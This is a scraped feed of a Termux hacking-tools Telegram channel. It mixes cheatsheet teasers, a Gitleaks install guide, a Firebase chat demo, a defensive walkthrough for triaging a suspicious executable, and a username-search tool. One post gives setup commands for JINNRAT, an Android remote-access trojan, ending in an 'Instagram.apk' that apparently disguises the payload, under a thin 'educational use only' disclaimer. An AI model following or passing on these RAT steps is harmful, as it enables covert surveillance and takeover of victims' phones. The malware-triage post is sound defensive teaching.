TERMUX COMMANDD
25.5K subscribers
551 photos
80 videos
10 files
156 links
🥇THIS IS THE TOP TERMUX CHANNEL ON TELEGRAM WITH 1000+ TOOLS🪩

🚪HOUSE OF PENTESTER

©ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLY🔺


ADS - @MARONADS
Download Telegram
PART 1 🔹 LINUX SHELL & BASH SCRIPTING CHEATSHEET
19
PART 2 🔹 LINUX SHELL & BASH SCRIPTING CHEATSHEET
11
Gitleaks scans Git repositories to detect leaked secrets such as passwords, API keys, tokens, and private keys.
It teaches how many real-world breaches happen due to developer mistakes, not “h4cking”.


pkg update && pkg upgrade -y
pkg install git golang -y
go install github.com/gitleaks/gitleaks/v8@latest
echo 'export PATH=$PATH:$HOME/go/bin' >> ~/.bashrc
source ~/.bashrc
gitleaks version

⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TERMUXCOMMANDD
18
PART 3 🔹 LINUX SHELL & BASH SCRIPTING CHEATSHEET
👍64
PART 4 🔹 LINUX SHELL & BASH SCRIPTING CHEATSHEET
9
Networking basics for DevOps
9
Merry Christmas to this amazing community! 🎄 Grateful for each one of you stay blessed.🤭
Please open Telegram to view this post
VIEW IN TELEGRAM
15🥰4👍1👏1
This media is not supported in your browser
VIEW IN TELEGRAM
Hashing with practical examples

ENJOY 😉
12👍1
Firebase Realtime Chat (Simple WhatsApp Logic)
🔹 Bio
Lightweight chat app demonstrating:
Realtime database
User presence
Message sync
Perfect for beginners.


pkg install git nodejs
git clone https://github.com/firebase/friendlychat
cd friendlychat
npm install

⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TERMUXCOMMANDD
13
How to stay Anonymous…
18👨‍💻1
📺💻How to Analyze a Suspicious File Properly

Step 1: Don’t trust the file name
File names lie all the time. A file like invoice_update.exe is already suspicious.
An invoice should never be a Windows executable.

Step 2: Check size & basic details
Always check the file size. Around 400 KB may be normal for a small program,
but it is completely abnormal for an invoice or document.

Step 3: Look inside without running it
You can learn a lot without executing the file.
Readable strings often expose program behavior such as system and internet usage
(kernel32.dll, LoadLibraryA, InternetOpenA, etc.).

Step 4: Look for URLs or web paths
Malware almost always communicates over the internet.
Finding URLs, API paths, or user-agents is a major red flag.
An invoice does not need internet access.

Step 5: Check if the file is hiding
Malware often packs or obfuscates its code to avoid detection.
High entropy or suspicious section names usually indicate this behavior.

Step 6: Put it all together
This file pretends to be an invoice, but it is actually a Windows program.
It contains internet communication code and hides its internal logic.
You don’t need advanced reversing skills to reach this conclusion.
This is beginner-level analysis done correctly.


file invoice_update.exe
ls -lh invoice_update.exe
strings invoice_update.exe | head
strings invoice_update.exe | grep -i http
pecheck invoice_update.exe
Please open Telegram to view this post
VIEW IN TELEGRAM
9💯3👍1
Comment below the output! 😃👇
🫡127👍1
9
Linux Architecture
12
JINNRAT - Remote Android Managment Suite

git clone https://github.com/alvinbaby/JINNRAT
cd JINNRAT
bash setup.sh

bash setup.sh

http://localhost:22533

username : admin
password : root

ls

cd JINNRAT

ls

bash setup.sh

Then click 3 after installation done after click 1 copy link I'd password

Then in In ip paste : 127.0.0.1
Port: 22222

then ctrl C after

ls

cd app

ls

cp Instagram.apk

Done


⚠️ Educational use only. Unauthorized or illegal use is strictly prohibited.

⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TERMUXCOMMANDD
26
How to Learn Backend Development?
7👨‍💻2
JavaScript array methods
8👍3
Comment below the output! 😃👇
10
Search for a username across hundreds of social networks.

git clone
https://github.com/p1ngul1n0/blackbird
7👍3
🤩🤩🎆New year. New strength. New opportunities.
Wishing you a year that changes everything for the better.
🎄2️⃣0️⃣2️⃣6️⃣
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍2
Well Known TCP&UDP Ports
8👍1